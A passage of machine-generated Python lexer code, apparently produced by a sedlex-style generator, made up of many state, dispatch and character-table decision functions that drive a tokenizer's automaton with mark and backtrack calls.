mark(lexerbuf, 57) state_id = _sedlex_decide_26(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_312[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_311(lexerbuf: lexbuf): result = -1 result = _sedlex_st_119(lexerbuf) return result def _sedlex_rnd_310(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_117(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_309[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_308(lexerbuf: lexbuf): result = -1 result = _sedlex_st_118(lexerbuf) return result def _sedlex_rnd_307(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_116(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_39(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_306[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_39(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_32[c - 48] - 1 else: return -1 def _sedlex_rnd_305(lexerbuf: lexbuf): result = -1 result = _sedlex_st_121(lexerbuf) return result def _sedlex_rnd_304(lexerbuf: lexbuf): result = -1 result = _sedlex_st_117(lexerbuf) return result def _sedlex_rnd_303(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_115(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_302[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_301(lexerbuf: lexbuf): result = -1 result = _sedlex_st_116(lexerbuf) return result def _sedlex_rnd_300(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_114(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 43) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_299[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_298(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_113(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_24(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_297[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_296(lexerbuf: lexbuf): result = -1 result = _sedlex_st_114(lexerbuf) return result def _sedlex_rnd_295(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_112(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 42) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_294[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_293(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_111(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_36(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_292[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_291(lexerbuf: lexbuf): result = -1 result = _sedlex_st_112(lexerbuf) return result def _sedlex_rnd_290(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_110(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 41) state_id = 
_sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_289[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_288(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_109(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_34(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_287[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_286(lexerbuf: lexbuf): result = -1 result = _sedlex_st_110(lexerbuf) return result def _sedlex_rnd_285(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_108(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_38(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_284[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_38(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_31[c - 48] - 1 else: return -1 def _sedlex_rnd_283(lexerbuf: lexbuf): result = -1 result = _sedlex_st_111(lexerbuf) return result def _sedlex_rnd_282(lexerbuf: lexbuf): result = -1 result = _sedlex_st_109(lexerbuf) return result def _sedlex_rnd_281(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_107(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 40) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_280[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_279(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_106(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_34(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_278[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_277(lexerbuf: lexbuf): result = -1 result = _sedlex_st_107(lexerbuf) return result def _sedlex_rnd_276(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_105(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_26(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_275[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_274(lexerbuf: lexbuf): result = -1 result = _sedlex_st_106(lexerbuf) return result def _sedlex_rnd_273(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_104(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_35(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_272[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_271(lexerbuf: lexbuf): result = -1 result = _sedlex_st_105(lexerbuf) return result def _sedlex_rnd_270(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_103(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_28(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_269[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_268(lexerbuf: lexbuf): result = -1 result = _sedlex_st_104(lexerbuf) return result def _sedlex_rnd_267(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_102(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 39) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if 
state_id >= 0: result = _sedlex_rnd_266[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_265(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_101(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 38) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_264[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_263(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_100(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_37(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_262[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_37(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_30[c - 48] - 1 else: return -1 def _sedlex_rnd_261(lexerbuf: lexbuf): result = -1 result = _sedlex_st_102(lexerbuf) return result def _sedlex_rnd_260(lexerbuf: lexbuf): result = -1 result = _sedlex_st_101(lexerbuf) return result def _sedlex_rnd_259(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_99(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 37) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_258[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_257(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_98(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_28(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_256[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_255(lexerbuf: lexbuf): result = -1 result = _sedlex_st_99(lexerbuf) return result def _sedlex_rnd_254(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_97(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_36(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_253[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_252(lexerbuf: lexbuf): result = -1 result = _sedlex_st_98(lexerbuf) return result def _sedlex_rnd_251(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_96(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_28(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_250[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_249(lexerbuf: lexbuf): result = -1 result = _sedlex_st_97(lexerbuf) return result def _sedlex_rnd_248(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_95(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 36) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_247[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_246(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_94(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_245[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_244(lexerbuf: lexbuf): result = -1 result = _sedlex_st_95(lexerbuf) return result def _sedlex_rnd_243(lexerbuf: lexbuf): result = -1 
result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_93(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_28(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_242[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_241(lexerbuf: lexbuf): result = -1 result = _sedlex_st_94(lexerbuf) return result def _sedlex_rnd_240(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_92(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_31(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_239[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_238(lexerbuf: lexbuf): result = -1 result = _sedlex_st_93(lexerbuf) return result def _sedlex_rnd_237(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_91(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_36(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_236[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_36(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_29[c - 48] - 1 else: return -1 def _sedlex_rnd_235(lexerbuf: lexbuf): result = -1 result = _sedlex_st_92(lexerbuf) return result def _sedlex_rnd_234(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_90(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_35(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_233[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_35(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_28[c - 48] - 1 else: return -1 def _sedlex_rnd_232(lexerbuf: lexbuf): result = -1 result = _sedlex_st_91(lexerbuf) return result def _sedlex_rnd_231(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_89(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_230[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_229(lexerbuf: lexbuf): result = -1 result = _sedlex_st_90(lexerbuf) return result def _sedlex_rnd_228(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_88(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 35) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_227[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_226(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_87(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_24(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_225[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_224(lexerbuf: lexbuf): result = -1 result = _sedlex_st_88(lexerbuf) return result def _sedlex_rnd_223(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_86(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 34) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_222[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_221(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return 
result def _sedlex_st_85(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_220[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_219(lexerbuf: lexbuf): result = -1 result = _sedlex_st_86(lexerbuf) return result def _sedlex_rnd_218(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_84(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_30(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_217[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_216(lexerbuf: lexbuf): result = -1 result = _sedlex_st_85(lexerbuf) return result def _sedlex_rnd_215(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_83(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_34(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_214[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_34(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_27[c - 48] - 1 else: return -1 def _sedlex_rnd_213(lexerbuf: lexbuf): result = -1 result = _sedlex_st_84(lexerbuf) return result def _sedlex_rnd_212(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_82(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_33(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_211[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_33(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_26[c - 48] - 1 else: return -1 def _sedlex_rnd_210(lexerbuf: lexbuf): result = -1 result = _sedlex_st_89(lexerbuf) return result def _sedlex_rnd_209(lexerbuf: lexbuf): result = -1 result = _sedlex_st_87(lexerbuf) return result def _sedlex_rnd_208(lexerbuf: lexbuf): result = -1 result = _sedlex_st_83(lexerbuf) return result def _sedlex_rnd_207(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_81(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 33) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_206[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_205(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_80(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_23(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_204[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_203(lexerbuf: lexbuf): result = -1 result = _sedlex_st_81(lexerbuf) return result def _sedlex_rnd_202(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_79(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 32) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_201[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_200(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_78(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_32(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_199[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_32(c: int): if 
c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_25[c - 48] - 1 else: return -1 def _sedlex_rnd_198(lexerbuf: lexbuf): result = -1 result = _sedlex_st_79(lexerbuf) return result def _sedlex_rnd_197(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_77(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 31) state_id = _sedlex_decide_31(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_196[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_31(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_24[c - 48] - 1 else: return -1 def _sedlex_rnd_195(lexerbuf: lexbuf): result = -1 result = _sedlex_st_78(lexerbuf) return result def _sedlex_rnd_194(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_76(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_193[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_192(lexerbuf: lexbuf): result = -1 result = _sedlex_st_77(lexerbuf) return result def _sedlex_rnd_191(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_75(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_30(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_190[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_30(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_23[c - 48] - 1 else: return -1 def _sedlex_rnd_189(lexerbuf: lexbuf): result = -1 result = _sedlex_st_76(lexerbuf) return result def _sedlex_rnd_188(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_74(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_29(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_187[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_29(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_22[c - 48] - 1 else: return -1 def _sedlex_rnd_186(lexerbuf: lexbuf): result = -1 result = _sedlex_st_80(lexerbuf) return result def _sedlex_rnd_185(lexerbuf: lexbuf): result = -1 result = _sedlex_st_75(lexerbuf) return result def _sedlex_rnd_184(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_73(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 30) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_183[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_182(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_72(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_28(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_181[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_28(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_21[c - 48] - 1 else: return -1 def _sedlex_rnd_180(lexerbuf: lexbuf): result = -1 result = _sedlex_st_73(lexerbuf) return result def _sedlex_rnd_179(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_71(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 29) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = 
_sedlex_rnd_178[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_177(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_70(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_27(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_176[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_27(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_20[c - 48] - 1 else: return -1 def _sedlex_rnd_175(lexerbuf: lexbuf): result = -1 result = _sedlex_st_71(lexerbuf) return result def _sedlex_rnd_174(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_69(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_26(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_173[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_26(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_19[c - 48] - 1 else: return -1 def _sedlex_rnd_172(lexerbuf: lexbuf): result = -1 result = _sedlex_st_70(lexerbuf) return result def _sedlex_rnd_171(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_68(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_170[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_25(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_18[c - 48] - 1 else: return -1 def _sedlex_rnd_169(lexerbuf: lexbuf): result = -1 result = _sedlex_st_69(lexerbuf) return result def _sedlex_rnd_168(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_67(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_24(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_167[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_24(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_17[c - 48] - 1 else: return -1 def _sedlex_rnd_166(lexerbuf: lexbuf): result = -1 result = _sedlex_st_68(lexerbuf) return result def _sedlex_rnd_165(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_66(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 28) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_164[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_163(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_65(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_23(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_162[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_23(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_16[c - 48] - 1 else: return -1 def _sedlex_rnd_161(lexerbuf: lexbuf): result = -1 result = _sedlex_st_66(lexerbuf) return result def _sedlex_rnd_160(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_64(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_159[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def 
_sedlex_decide_22(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_15[c - 48] - 1 else: return -1 def _sedlex_rnd_158(lexerbuf: lexbuf): result = -1 result = _sedlex_st_65(lexerbuf) return result def _sedlex_rnd_157(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_61(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_156[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_155(lexerbuf: lexbuf): result = -1 result = 60 return result def _sedlex_rnd_154(lexerbuf: lexbuf): result = -1 result = _sedlex_st_60(lexerbuf) return result def _sedlex_st_60(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_153[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_152(lexerbuf: lexbuf): result = -1 result = _sedlex_st_61(lexerbuf) return result def _sedlex_rnd_151(lexerbuf: lexbuf): result = -1 result = _sedlex_st_60(lexerbuf) return result def _sedlex_st_59(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_150[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_149(lexerbuf: lexbuf): result = -1 result = 60 return result def _sedlex_rnd_148(lexerbuf: lexbuf): result = -1 result = _sedlex_st_52(lexerbuf) return result def _sedlex_st_58(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_19(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_147[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_146(lexerbuf: lexbuf): result = -1 result = _sedlex_st_59(lexerbuf) return result def _sedlex_rnd_145(lexerbuf: lexbuf): result = -1 result = _sedlex_st_52(lexerbuf) return result def _sedlex_st_57(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_144[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_143(lexerbuf: lexbuf): result = -1 result = 60 return result def _sedlex_rnd_142(lexerbuf: lexbuf): result = -1 result = _sedlex_st_55(lexerbuf) return result def _sedlex_st_56(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_19(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_141[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_140(lexerbuf: lexbuf): result = -1 result = _sedlex_st_57(lexerbuf) return result def _sedlex_rnd_139(lexerbuf: lexbuf): result = -1 result = _sedlex_st_55(lexerbuf) return result def _sedlex_st_55(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_138[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_137(lexerbuf: lexbuf): result = -1 result = _sedlex_st_56(lexerbuf) return result def _sedlex_rnd_136(lexerbuf: lexbuf): result = -1 result = _sedlex_st_55(lexerbuf) return result def _sedlex_st_54(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 60) state_id = _sedlex_decide_19(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_135[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_134(lexerbuf: lexbuf): result = -1 result = _sedlex_st_57(lexerbuf) return result def _sedlex_rnd_133(lexerbuf: lexbuf): result = -1 result = 
